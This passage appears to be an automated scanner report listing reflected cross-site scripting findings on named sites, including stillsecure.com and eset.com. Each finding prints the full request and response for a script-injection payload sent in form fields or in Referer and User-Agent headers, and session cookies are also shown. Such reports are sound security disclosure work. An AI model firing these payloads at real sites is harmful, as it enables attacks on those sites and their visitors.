Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17190

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="firstName" type="text" value="54249\"><script>alert(1)</script>bb0ca4d9c50">
...[SNIP]...

5.47. http://www.stillsecure.com/m/ [lastName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /m/

Issue detail

The value of the lastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb23d"><script>alert(1)</script>9630ad29cfd was submitted in the lastName parameter. This input was echoed as eb23d\"><script>alert(1)</script>9630ad29cfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=eb23d"><script>alert(1)</script>9630ad29cfd&company=&email=&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:42 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17178

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="lastName" type="text" value="eb23d\"><script>alert(1)</script>9630ad29cfd">
...[SNIP]...

5.48. http://www.stillsecure.com/m/ [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /m/

Issue detail

The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffb4b"><script>alert(1)</script>380c8aa2910 was submitted in the phone parameter. This input was echoed as ffb4b\"><script>alert(1)</script>380c8aa2910 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=&email=&phone=ffb4b"><script>alert(1)</script>380c8aa2910&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:52 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17138

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="phone" type="text" value="ffb4b\"><script>alert(1)</script>380c8aa2910">
...[SNIP]...

5.49. https://hourly.deploy.com/hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload c6f43<script>alert(1)</script>9d16581bbf9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)c6f43<script>alert(1)</script>9d16581bbf9
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Mon, 25 Apr 2011 13:41:34 GMT
Server: Apache/2.0.46 (Red Hat)
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:34 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)c6f43<script>alert(1)</script>9d16581bbf9</td>
...[SNIP]...

5.50. http://www.eset.com/business/server-security/linux-file [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /business/server-security/linux-file

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 619e4"-alert(1)-"482a8458b9e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /business/server-security/linux-file HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=619e4"-alert(1)-"482a8458b9e
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.1.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738137976%3B%20gpv_pageName%3Dus/business/products%7C1303738137981%3B%20s_nr%3D1303736337984-Repeat%7C1335272337984%3B%20s_invisit%3Dtrue%7C1303738137988%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 17267
Date: Mon, 25 Apr 2011 12:59:24 GMT
X-Varnish: 1310979423
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>M
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=619e4"-alert(1)-"482a8458b9e";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.51. http://www.eset.com/us [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4087"-alert(1)-"8cebc1897b2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B
Referer: http://www.google.com/search?hl=en&q=f4087"-alert(1)-"8cebc1897b2

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:18:23 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26712
Date: Mon, 25 Apr 2011 15:18:23 GMT
X-Varnish: 555657802
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=f4087"-alert(1)-"8cebc1897b2";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.52. http://www.eset.com/us/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 631c6"-alert(1)-"5990df6aee9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B
Referer: http://www.google.com/search?hl=en&q=631c6"-alert(1)-"5990df6aee9

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=4; expires=Fri, 24-Jun-2011 15:20:14 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26742
Date: Mon, 25 Apr 2011 15:20:14 GMT
X-Varnish: 555663552
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=631c6"-alert(1)-"5990df6aee9";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.53. http://www.eset.com/us/business/products [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/business/products

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c73f"-alert(1)-"f9f42456929 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B
Referer: http://www.google.com/search?hl=en&q=7c73f"-alert(1)-"f9f42456929

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21125
Date: Mon, 25 Apr 2011 12:53:27 GMT
X-Varnish: 1310966651
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=7c73f"-alert(1)-"f9f42456929";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.54. http://www.eset.com/us/business/server-security/linux-file [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/business/server-security/linux-file

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95bca"-alert(1)-"1b87eb369cb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/business/server-security/linux-file HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=95bca"-alert(1)-"1b87eb369cb
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.1.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738137976%3B%20gpv_pageName%3Dus/business/products%7C1303738137981%3B%20s_nr%3D1303736337984-Repeat%7C1335272337984%3B%20s_invisit%3Dtrue%7C1303738137988%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 17267
Date: Mon, 25 Apr 2011 12:59:23 GMT
X-Varnish: 1310979390
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>M
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=95bca"-alert(1)-"1b87eb369cb";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.55. http://www.eset.com/us/home/smart-security [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/smart-security

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec105"-alert(1)-"6412896c31 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=ec105"-alert(1)-"6412896c31
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952767|check#true#1303743227|session#1303743154006-383984#1303745027; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.2.10.1303743158; s_pers=%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%252C%255B%2527Other%252520Referrers-shopping.netsuite.com%2527%252C%25271303743170439%2527%255D%255D%7C1461595970439%3B%20s_visit%3D1%7C1303745017240%3B%20gpv_pageName%3Dus/new_homepage%7C1303745017242%3B%20s_nr%3D1303743217244-Repeat%7C1335279217244%3B%20s_invisit%3Dtrue%7C1303745017246%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedshopping.netsuite.comshopping.netsuite.com%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/new_homepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/home/smart-security%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25525
Date: Mon, 25 Apr 2011 15:18:50 GMT
X-Varnish: 555659225
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=ec105"-alert(1)-"6412896c31";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.56. http://www.eset.com/us/store [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

